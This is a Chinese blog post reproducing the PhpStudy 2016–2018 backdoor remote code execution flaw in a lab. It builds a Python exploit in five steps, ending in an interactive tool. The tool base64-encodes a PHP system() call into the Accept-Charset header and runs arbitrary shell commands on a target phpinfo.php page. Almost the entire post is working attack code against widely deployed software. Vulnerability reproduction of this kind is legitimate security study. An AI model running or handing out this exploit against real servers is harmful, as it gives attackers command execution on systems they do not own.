PhpStudy-RCE漏洞
PhpStudy_2016-2018_RCE漏洞复现_L尘痕的博客-CSDN博客
首先先看到编写的收手点
基础环境
python编写工具:vscode
运行脚本:cmd窗口(管理员身份运行)
ECP编写
1、模拟数据包的发送
# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close
import requests
# 定义request请求
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
"Accept-Encoding" : "gzip,deflate"
}
# 定义具体需要的关键字段
res = requests.get(url = url)
# 获取到GET请求
print(res.text)
# 对上述内容做输出
2、输出的内容不简洁,需要再次修改
import requests
# 定义request请求
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : "c3lzdGVtKCdpcGNvbmZpZycpOw==",
"Accept-Encoding" : "gzip,deflate"
}
# 定义具体需要的关键字段
res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出
3、这时EXP所达到的效果得到初步的实现,只需将ipconfig编码改变就可以实现,为了更方便的使用,我们需要将编码变成cmd
import requests
# 定义request请求
import base64
# 导入base64模块
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
cmd = "system('whoami');"
# 定义输入的命令
cmd = base64.b64encode(cmd.encode())
# 以二进制的方式进行编码
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : cmd,
"Accept-Encoding" : "gzip,deflate"
}
# 定义具体需要的关键字段
res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出
4、直接在cmd窗口输入命令
import requests
# 定义request请求
import base64
# 导入base64模块
url = "http://192.168.153.232/phpinfo.php"
# 定义针对的目标
while True :
# 让以下程序做循环
cmd = input("-->")
# 不用在脚本中修改命令,直接在窗口输入,得到结果
if cmd == 'q!' :
# 如果输入q!则终止循环
break
# 跳出循环
cmd = f"system('{cmd}');"
# 定义输入的命令
cmd = base64.b64encode(cmd.encode())
# 以二进制的方式进行编码
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : cmd,
"Accept-Encoding" : "gzip,deflate"
}
# 定义具体需要的关键字段
res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.text[0:res.text.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
print(result)
# 对上述内容做输出
5、对脚本进行美化,得到最终EXP
# GET /phpinfo.php HTTP/1.1
# Host: 192.168.153.232
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# Referer: http://192.168.153.232/
# Content-Length: 0
# Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
# Accept-Encoding: gzip,deflate
# Accept-Language: en-US,en;q=0.9
# Connection: close
import requests
# 定义request请求
import base64
# 导入base64模块
import sys
# 导入sys模块
banner = '''
---------------------------------------------------------------------
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|p|h|p|s|t|u|d|y|2|0|1|6|r|c|e|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Usage: python *.py http://192.168.153.232/phpinfo.php
---------------------------------------------------------------------
'''
# 美化脚本并提示脚本的用法,当然也可以写入作者
if len(sys.argv) < 2 :
# 如果没有给脚本并给的参数不小于2
print(banner)
# 则输出提示
exit()
# 否则退出,不执行以下程序
url = sys.argv[1]
# 定义针对的目标
def attack(cmd) :
cmd = f"system('{cmd}');"
# 定义输入的命令
cmd = base64.b64encode(cmd.encode())
# 以二进制的方式进行编码
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
"Accept-Charset" : cmd,
"Accept-Encoding" : "gzip,deflate"
}
# 定义具体需要的关键字段
res = requests.get(url = url, headers = headers)
# 获取到GET请求
result = res.content.decode("gb2312")
# 以二进制的方式解码在输出成中文
result = result[0:result.find("<!DOCTYPE html")]
# 对整体做切片,以内容的头部明显字段做目标来达到效果
return result
# 对上述内容做输出
while True :
# 让以下程序做循环
cmd = input("请输入命令 : ")
# 不用在脚本中修改命令,直接在窗口输入,得到结果
result = attack(cmd)
# 返回result内容
print(result)
# 输出result内容
if cmd == 'q!' :
# 如果输入q!则终止循环
break
# 则跳出循环
有问题可以随时进行探讨哦!!!
#认真走好每一小步 请多指教
@L尘痕